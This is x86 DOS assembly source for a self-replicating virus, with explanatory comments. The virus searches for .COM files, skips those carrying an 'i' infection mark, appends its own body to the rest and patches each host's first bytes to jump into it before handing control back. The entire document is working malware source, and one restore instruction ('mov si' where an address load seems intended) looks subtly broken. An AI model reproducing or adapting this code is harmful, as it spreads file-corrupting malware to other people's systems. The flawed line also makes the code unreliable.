.model tiny .code ORG 100h start: call deltaoff deltaoff: pop bp ;get a reference to the code here sub bp,offset deltaoff ;subtract everything till here ;and we have the delta offset mov ah,1ah ;set DTA routine lea dx,[bp+offset endvirus] ;dx refers to the unitialized DTA int 21h search: mov ah,4eh ;the findfirst DOS function lea dx,[bp+offset fmask] ;search string '*.com' xor cx,cx ;normal attribute files ff: ;ff= find file int 21h ;do it! jc remake4bytes ;no file found, well that's life ;remake the 4 bytes of host and ;execute it jmp check ;else check file nsearch: mov ah,4fh jmp ff dinfect: mov ah,3eh int 21h mov ah,1ah ;Reset DTA mov dx,0080h int 21h jmp remake4bytes remake4bytes: mov si,[bp+offset byt4] mov di,100h movsw ;move the first 2 bytes movsw ;move the second word=2bytes push di ret check: lea dx,[bp+offset endvirus+1eh] ;open file mov ax,3D02h ;readmode int 21h jc nsearch ;error? make another search xchg ax,bx ;give the file handle to bx mov cx,4 ;read 4 bytes from start mov ah,3fh ;the function lea dx,[bp+byt4] ;and store them in byt4 int 21h cmp byte ptr [bp+byt4+3],'i' ;infection mark found? je closeSearchAnother ;yes?close it and search ;another - else => infect: mov ax,4202h ;move to eofile=place to append xor cx,cx xor dx,dx ;optimization=cwd int 21h sub ax,0003h ;calculate vir jump mov word ptr [bp+jmptbl+1],ax ;store it in jmptbl mov ah,40h ;write function mov cx,endvirus-start ;how many bytes lea dx,[bp+offset start] ;source int 21h mov ax,4200h ;go to start of file xor cx,cx ;cx=0 cwd ;optimized xor dx,dx -= it works if int 21h ;ax < 8000h mov ah,40h ;write our jump table which is mov cx,4 ;4 bytes long lea dx,[bp+jmptbl] ;This table :) int 21h jmp dinfect ;infection done ... yes end the virus closeSearchAnother: mov ah,3eh ;close active file int 21h jmp nsearch ;go and search another variables: fmask db '*.com',0 ;the search string byt4 db 0e9h,00h,00h,'i' ;the original 4 bytes of the host jmptbl db 0e9h,00h,00h,'i' ;jump tabel partialy build endvirus: ;here will be the DTA appended end start